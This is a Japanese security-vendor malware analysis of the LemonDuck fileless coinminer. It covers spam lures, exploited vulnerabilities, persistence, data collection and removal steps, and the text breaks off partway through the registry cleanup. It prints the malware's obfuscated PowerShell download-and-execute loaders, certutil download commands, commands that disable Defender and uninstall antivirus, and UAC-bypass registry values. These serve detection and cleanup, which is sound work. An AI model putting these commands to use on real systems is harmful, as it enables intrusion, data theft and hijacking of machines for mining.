Fileless.LEMONDUCK

2021年5月6日

解析者: Arianne Grace Dela Cruz

別名:

Trojan-Dropper.PowerShell.Compressed.b (KASPERSKY); Trojan.PowerShell.Crypt (IKARUS)

プラットフォーム:

Windows, Linux

危険度:

ダメージ度:

感染力:

感染確認数:

情報漏えい:

マルウェアタイプ: 仮想通貨発掘ツール（コインマイナー）
破壊活動の有無: なし
暗号化: なし
感染報告の有無: はい

概要

感染経路 Eメールを介したスパム活動, ソフトウェアの脆弱性を利用した感染活動

コインマイナーは、他のマルウェアもしくはグレイウェア、または不正リモートユーザによるスパムメールに添付され、コンピュータに侵入します。

コインマイナーは、ソフトウェアに存在する脆弱性を利用して、同じネットワーク上にある他のコンピュータへの感染活動をします。

コインマイナーは、ダウンロードしたファイルを実行します。

コインマイナーは、感染コンピュータ上の特定の情報を収集します。

コインマイナーは、特定の脆弱性を利用した感染活動を実行します。

詳細

ファイルサイズ 3,845 bytes

タイプ PS1

メモリ常駐なし

発見日 2021年4月28日

ペイロードファイルの暗号化, システム情報の収集, URLまたはIPアドレスに接続, ファイルのダウンロード, ファイルの作成

侵入方法

コインマイナーは、他のマルウェアもしくはグレイウェア、または不正リモートユーザによる以下のスパムメールに添付され、コンピュータに侵入します。

Where Email Subject - Message Body can be any of the following combinations:
- The Truth of COVID-19 - Virus actually comes from United States of America
- COVID-19 nCov Special info WHO - very important infomation for Covid-19 see attached document for your action and discretion.
- HALTH ADVISORY:CORONA VIRUS - the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future. see attached document for your action and discretion.
- WTF - what's wrong with you?are you out of your mind!!!!!
- What the fcuk - are you out of your mind!!!!!what 's wrong with you?
- good bye - good bye, keep in touch
- farewell letter - good bye, keep in touch
- broken file - can you help me to fix the file,i can't read it
- This is your order? - file is brokened, i can't open it

コインマイナーは、以下の方法でコンピュータに侵入します。

This malware may arrive by taking advantage of the following vulnerabilities:
- SMB request - Eternal Blue Exploit (CVE-2017-0144)
- SMBGhost vulnerability
It may be delivered once a system has been compromised due to the ProxyLogon Vulnerability:
- CVE-2021-26855
- CVE-2021-26857
- CVE-2021-26858
- CVE-2021-27065
RDP Brute-Forcing
SSH brute-forcing
Pass-the-hash attack using Mimikatz
MS-SQL brute-forcing
Redis remote command
Yarn remote command
Some variants of LemonDuck arrives via certutil LoLBin command:
- certutil -urlcache -split -f http://t.{BLOCKED}n.com/dns dn.ps1 - detected as Trojan.Win32.LEMONDUCK.THDBHBA
- certutil -urlcache -split -f http://t.{BLOCKED}n.com/m6.exe m6.exe - detected as Coinminer.Win64.TOOLXMR.SMA
- certutil -urlcache -split -f http://t.{BLOCKED}n.com/svchost.exe svchost.dat - detected as HackTool.Win32.NSSM.AD, used to install m6.exe as a service named "Windowsm_Update"

インストール

コインマイナーは、以下のファイルを作成します。

{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data - serves as infection marker
Some LemonDuck variants deployed via the ProxyLogon vulnerability can drop the following files:
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx - Chopper Webshell

(註：%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)

コインマイナーは、以下のファイルを作成し実行します。

%User Temp%\tt.vbs - install scheduled task to execute kk4kk.log (detected as HackTool.Win32.Mpacket.SM)
%System%\WindowsPowerShell\v1.0\{Random}.exe - legitimate copy of Powershell.exe

(註：%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)

コインマイナーは、以下のプロセスを追加します。

cmd /c start /b notepad "+{Malware file name}+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('{Download URL}7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('{Download URL}mail.jsp?js_0.7')"
cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden
ComputerDefaults.exe - if ran in Windows 10
CompMgmtLauncher.exe - if ran in other OS
To uninstall antivirus related programs:
- cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
- cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
To open ports:
- cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd
- netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
- netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block
- netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block
cmd.exe /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='9f9075b6db0089161c96cabf65974fa3';$ifp=$env:tmp+'\kr.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
cmd.exe /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='144f3ede7ec9d604a58113fc91a246d1';$ifp=$env:tmp+'\if.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
For 64bit machines:
- cmd.exe /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\elocalTMn',[ref]$localKr)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
For 64bit machines and video card is any of the following: {GTX, NVIDIA, GEFORCE, Radeon, AMD}
- cmd.exe /c echo try{$localTMng=$flase;New-Object Threading.Mutex($true,'Global\elocalTMng',[ref]$localKr)}catch{};$ifmd5='a921b532d5d239e4a2e71e5f853195cd';$ifp=$env:tmp+'\m6g.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6g.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
Some variants of LemonDuck execute the following:
- Add users and local groups:
- Delete AV related firewall rules:
- Delete AV related services:
- powershell.exe -psconsolefile "$env:exchangeinstallpath\bin\exshell.psc1" -command "New-ManagementRoleAssignment –Role 'Mailbox Import Export' –User netcat"
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

(註：%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)

コインマイナーは、以下のフォルダを作成します。

Variants of LemonDuck deployed via ProxyLogon Vulnerability can create the following folders:
- %System%\inetpub\wwwroot\aspnet_client\js\demo
- {Exchange server installation path}\Frontend\HttpProxy\ecp\auth\js\demo

(註：%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)

他のシステム変更

コインマイナーは、以下のレジストリ値を変更します。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\LanmanServer\Parameters
DisableCompression = 1

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
DelegateExecute = {Null}

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')

HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
DelegateExecute = {Null}

HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
(default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')

感染活動

コインマイナーは、以下のソフトウェアに存在する脆弱性を利用して、ネットワーク上で感染活動をします。

SMB request - Eternal Blue Exploit (CVE-2017-0144)
- Upon exploitation, it may perform the following:
  - Execute the following command: cmd /c schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa /tr "powershell -c '\\"{Download URL 1}\\",\\"{Download URL 2}\\",\\"{Download URL 2}\\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\\"DownloadString\\"(\\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\\")}'" /F & echo %path%|findstr /i powershell>nul || (setx path "%path%;c:\windows\system32\WindowsPowershell\v1.0" /m) & schtasks /run /tn Rtsa
  - Install the following scheduled task:
SMBGhost vulnerability
- Upon exploitation, it executes the following command:
RDP Brute-Forcing
SSH brute-forcing
- Upon exploitation, it may execute the following:
Pass-the-hash Attack
- Uses PowerDump module and Mimikatz to dump Username, password, NTLM hashes, and domain information of the target machine.
MS-SQL brute-forcing
- Upon successful brute-forcing, it will add a malware detected as HackTool.Win32.EvilCLR.YXBCIA to the database server to enable the execution of the following: "powershell.exe iex(new-object net.webclient).downloadstring('{Download URL}/if.bin?once')"
- It scans for vulnerable MS-SQL port 1433. Upon exploitation, it will execute the following commands:
Redis remote command
- Upon scanning for vulnerable port 6379, 16379, it may perform the following command:
Yarn remote command
- Upon scanning for vulnerable port 8088, it may perform the following command:
Logic Port Scan
- Upon scanning for vulnerable port 7001, it may perform the following command:
Vulnerable networks in port 445
- Upon exploiting vulnerable networks connecting to port 445, it does the following:

(註：%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.. %User Startup%フォルダは、現在ログオンしているユーザのスタートアップフォルダです。Windows 98およびMEの場合、通常 "C:\Windows\Profiles\＜ユーザ名＞\Start Menu\Programs\Startup" です。Windows NTの場合、通常 "C:\WINNT\Profiles\＜ユーザ名＞\Start Menu\Programs\Startup" です。Windows 2003(32-bit)、XP、2000(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Start Menu\Programs\Startup" です。Windows Vista、7、8、 8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" です。)

プロセスの終了

コインマイナーは、感染コンピュータ上で確認した以下のサービスを終了します。

.Net CLR
\gm
360rTys
ALGM
aspnet_staters
AxInstSV
ClipBooks
CLR
clr_optimization
DNS Server
ExpressVNService
IPSECS
lsass
Microsoft
Microsoft Telemetry
MpeSvc
mssecsvc2.0
mssecsvc2.1
Natimmonal
Nationaaal
National
Nationalaie
Nationalmll
Nationaloll
Nationalwpi
NetMsmqActiv Media NVIDIA
Oracleupdate
RpcEptManger
Samserver
Serhiez
Sncryption Media Playeq
Sougoudl
SRDSL
SuperProServer
SvcNlauser
SVSHost
SxS
sysmgt
system
taskmgr1
WebServers
WifiService
Windows Managers
Windows_Update
WinHasdadelp32
WinHasdelp32
WinHelp32
WinHelp64
WinHelpSvcs
WinSvc
WinVaultSvc
WissssssnHelp32
WmdnPnSN
wmiApServs
wmiApSrvs
WWW.{BLOCKED}S.CN.COM
Xtfy
Xtfya
Xtfyxxx
xWinWpdSrv
Zational

コインマイナーは、感染コンピュータ上でプロセスが常駐されていることを確認した場合、以下のいずれかの文字列を含むプロセスまたはサービスを終了します。

360
8866
9696
9797
9966
auto-upgeade
Avira
Calligrap
cara
Carbon
carss
cohernece
conhoste
csrsc
DW20
explores
Galligrp
gxdrv
Imaging
javaupd
lsmosee
minerd
MinerGate
msinfo
ress
SC
SearchIndex
secuams
service
Setring
Setting
Sqlceqp
SQLEXPRESS_X64_86
SQLforwin
svchosti
svshost
SystemIIS
SystemIISSec
taskegr
taskmgr1
Terms.EXE
Uninsta
update
upgeade
WerFault
WerMgr
win
WindowsDefender*
WindowsUpdater*
Workstation
xig*
XMR*
xmrig*
yamm1
360bdoctor.exe
360rp.exe
360rps.exe
360safe_cq.exe
360safe_se.exe
360sd.exe
360speedld.exe
360Tray.exe
360LogCenter.exe
360tray.exe
360speedld.exe
360se.exe

作成活動

コインマイナーは、以下のソフトウェアに存在する脆弱性を利用して感染活動をします。この脆弱性が利用されると、コインマイナーは不正なファイルを作成します。

Windows LNK Remote Code Execution Vulnerability (CVE-2017-8464) - Dropped in removable drives to allow execution of remote commands.

ダウンロード活動

コインマイナーは、以下のWebサイトにアクセスして自身のコンポーネントファイルをダウンロードします。

{Download URL}\m6.bin
{Download URL}\m6g.bin
{Download URL}\kr.bin
{Download URL}\if.bin
{Download URL}\if_mail.bin
{Download URL}\ode.bin
{Download URL}\nvd.zip
{Download URL}\20.dat - saved as %User Temp%\kk4kk.log
{Download URL}\mso.jsp
{Download URL}\ms.jsp
{Download URL}\rdp.jsp
{Download URL}\rdpo.jsp
{Download URL}\smgh.jsp
{Download URL}\smgho.jsp
{Download URL}\logic.jsp
{Download URL}\logico.jsp
{Download URL}\report.jsp - install scheduled tasks and WMI
{Download URL}\mm.bin - Mimikatz module
{Download URL}\core.png - Linux bash file for downloading related modules
{Download URL}\a.asp - Linux bash file for killing competitions

コインマイナーは、以下のファイル名でダウンロードしたファイルを保存します。

%User Temp%\m6.bin - Modified XMRig for 64bit Machines
%User Temp%\m6g.bin - Coinminer for 64bit Machines and video card name has the one of the following strings:"GTX","NVIDIA","GEFORCE","Radeon","AMD"
%User Temp%\kr.bin - Kill Competitions Module
%User Temp%\if.bin - Propagation and Exploitation Module
%User Temp%\if_mail.bin - Email Spreader Module
%User Temp%\ode.bin - Downloads PowerSploit module and create scheduled task
%User Temp%\nvd.zip - Coinminer for 64bit Machines and video card name has the one of the following strings:"GTX","NVIDIA","GEFORCE","Radeon","AMD"
%User Temp%\mimi.dat - Mimikatz module
Modules for Process Termination, Task and WMI installation:
- %User Temp%\mso.jsp
- %User Temp%\ms.jsp
- %User Temp%\rdp.jsp
- %User Temp%\rdpo.jsp
- %User Temp%\smgh.jsp
- %User Temp%\smgho.jsp
- %User Temp%\logic.jsp
- %User Temp%\logico.jsp

コインマイナーは、ダウンロードしたファイルを実行します。

情報漏えい

コインマイナーは、感染コンピュータ上の以下の情報を収集します。

Machine Type (32bit or 64bit)
Computer Name
Product UUID
Mac Address
Operating system
User name
Machine Domain
System uptime
Video Controller name
Physical memory
Drive information:
- Drive Type
- Free space
- Drive format
Time stamp
JavaScript information on localhost
Host Name
Coinminer version - if a coinminer is present
Ip address - if a coinminer is present
Total hashrate - if a coinminer is present
First 6 bytes of md5 hashes of malicious files

その他

コインマイナーは、以下を実行します。

It
Infection Marker:

__EventFilter

Name: blackball

Persistence:

__EventFilter

Name: {Random}

CommandLineEventConsumer

Name: {Random}
Command: powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect
__FilterToConsumerBinding

It disables Windows Defender Real Time Monitoring. It excludes Powershell.exe running in C:\ directory in Windows
http://t.{BLOCKED}g.com
http://t.{BLOCKED}9.com
http://t.{BLOCKED}x.com
http://t.{BLOCKED}q.com
http://d.{BLOCKED}p.com
http://t.{BLOCKED}1.com
http://t.{BLOCKED}0.com
http://down.{BLOCKED}cat.com
http://t.{BLOCKED}kit.com
http://t.{BLOCKED}kit.com
http://d.{BLOCKED}g.com
http://p.{BLOCKED}q.com
http://lplp.{BLOCKED}g.com
http://w.{BLOCKED}0.com
http://info.{BLOCKED}x.com
http://info.{BLOCKED}g.com
http://info.{BLOCKED}0.com
http://t.{BLOCKED}q.top
http://p.{BLOCKED}a.com
http://t.{BLOCKED}2.com
http://t.{BLOCKED}q.com
http://ps2.{BLOCKED}ihua
http://t.{BLOCKED}n.com
http://t.{BLOCKED}r.cc
http://t.{BLOCKED}0.sh
http://t.{BLOCKED}cat.co
http://d.{BLOCKED}8.ag
{BLOCKED}.{BLOCKED}.154.202
{BLOCKED}.{BLOCKED}.7.85
{BLOCKED}.{BLOCKED}.43.37
{BLOCKED}.{BLOCKED}.225.82
{BLOCKED}.{BLOCKED}.107.193
{BLOCKED}.{BLOCKED}.80.221
{BLOCKED}.{BLOCKED}.183.160
{BLOCKED}.{BLOCKED}.188.255
{BLOCKED}.{BLOCKED}.158.207

Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

It will only modify "HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command" if the OS is Windows 10. Otherwise, the registry "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" will be modified.
It deletes the following scheduled tasks:
- /Rtsa
- /Rtsa1
- /Rtsa2
- AdobeFlashPlayer
- Bluetooths
- Credentials
- Ddrivers
- DNS
- DnsCore
- DnsCore
- DnsScan
- ECDnsCore
- Flash
- FlashPlayer1
- FlashPlayer2
- FlashPlayer3
- gm
- GooglePingConfigs
- HispDemorn
- HomeGroupProvider
- IIS
- LimeRAT-Admin
- Microsoft Telemetry
- Miscfost
- MiscfostNsi
- my1
- Mysa
- Mysa1
- Mysa2
- Mysa3
- Netframework
- ngm
- ok
- Oracle Java
- Oracle Java Update
- Oracle Products Reporter
- RavTask
- skycmd
- Sorry
- Spooler SubSystem Service
- System Log Security Check
- SYSTEM"qPt,"DNS2
- SYSTEMa
- TablteInputout
- Update
- Update qPtservice for Windows Service
- Update service for products
- Update_windows
- Update1
- Update2
- Update3
- Update4
- WebServers
- werclpsyport
- Windows_Update
- WindowsLogTasks
- WindowsUpdate1
- WindowsUpdate2
- WindowsUpdate3
- WwANsvc
It check the presence of Outlook and Outlook\Security in the following registry keys:
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Office
If present, it will modify the registry entry:
{Registry Key from list above}
ObjectModelGuard = 2
It uses any of the following {Download URL} to send gathered information, as well as download related modules:
- http://t.{BLOCKED}9.com
It sets the machine's DNS server to Google (8.8.8.8 or 9.9.9.9)
It uses the following credentials for brute-forcing:
- Username:
- Passwords:
- NTLM Hashes:
It sends copies of itself as zip attachment to email addresses gathered from the victim machine's Outlook contacts, inbox and sent items. It would delete the emails it sent from the sent items folder.
It tries to connect to the named pipe \.\pipe\HHyeuqi7\ and execute its email propagation module.
It terminates processes connecting to the following domains:
- pg.{BLOCKED}q.com
- p.{BLOCKED}q.com
- pg.{BLOCKED}4.com
- p.{BLOCKED}4.com
- lplp.{BLOCKED}g.com
It terminates processes that established a TCP connection to the following ports:
- 1111
- 2222
- 3333
- 4444
- 5555
- 6666
- 7777
- 8888
- 9999
- 14433
- 14444
- 43669
- 43668
- 45560
- 65333

コインマイナーは、以下の脆弱性を利用して感染活動を実行します。

CVE-2017-0199 - Allows remote code execution upon opening the DOC file detected as Trojan.W97M.LEMONDUCK.*

以下のスケジュールされたタスクを追加します：

Task Name: blackball
Task to be run: blackball
Task Name: {random}
Task to be run: powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

対応方法

対応検索エンジン: 9.800

初回 VSAPI パターンバージョン 15.932.08

初回 VSAPI パターンリリース日 2020年5月7日

VSAPI OPR パターンバージョン 15.933.00

VSAPI OPR パターンリリース日 2020年5月8日

手順 1

Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム（OS）の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル／フォルダ／レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 3

Windowsをセーフモードで再起動します。

[ 詳細 ]

セーフモードでの起動：

• Windows 2000 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows XP の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows Server 2003 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows Vista、Windows 7 および Windows Server 2008 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「詳細ブートオプション」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows 8、8.1 および Server 2012の場合：

画面の右上隅へマウスポインタを移動し、[チャーム]バーを表示します。
マウスで、[設定]－[PC設定の変更]を選択します。
左側のパネルで、[全般]を選択します。
右側のパネルで、[PCの起動をカスタマイズする]が表示されるまで下にスクロールし、[今すぐ再起動]をクリック。コンピュータが再起動するまで待ちます。
[オプションの選択]メニューで、[トラブルシューティング]－[詳細オプション]－[スタートアップ設定]－[再起動]をクリックします。
[スタートアップ設定]メニューで、[4]キーを押し、「4）セーフモードを有効にする」を選択します。

手順 4

変更されたレジストリ値を修正します。

[ 詳細 ]

警告：レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
- DisableCompression = 1
- DisableCompression = {Default}
In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- (default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- (default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
- {Registry Key in Outlook\Security in the list mentioned}
- ObjectModelGuard = 2
- ObjectModelGuard = {Default}

変更されたレジストリ値の修正：

「レジストリエディタ」を起動します。
- Windows 2000、XP および Server 2003 の場合：
  [スタート]-[ファイル名を指定して実行]を選択し、regedit と入力し、Enter を押します。
- Windows Vista、7 および Server 2008 の場合：
  [スタート]をクリックし、検索入力欄に regedit と入力し、Enter を押します。
- Windows 8、8.1 および Server 2012 の場合：
  画面の左下隅を右クリックし、[ファイル名を指定して実行]を選択します。入力ボックスに regedit と入力し、Enter を押します。
※regedit は半角英数字で入力する必要があります（大文字／小文字は区別されません）。
「レジストリエディタ」の左側のパネルにある以下のフォルダをダブルクリックします。
HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Services>LanmanServer>Parameters
右側のパネルで以下のレジストリ値を検索します。
DisableCompression = 1
「レジストリエディタ」の左側のパネルにある以下のフォルダをダブルクリックします。
HKEY_CURRENT_USER>Software>Classes>ms-settings>shell>open>command
右側のパネルで以下のレジストリ値を検索します。
DelegateExecute = {Null}
再び、右側のパネルで以下のレジストリ値を検索します。
(default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
「レジストリエディタ」の左側のパネルにある以下のフォルダをダブルクリックします。
HKEY_CURRENT_USER>Software>Classes>mscfile>shell>open>command
右側のパネルで以下のレジストリ値を検索します。
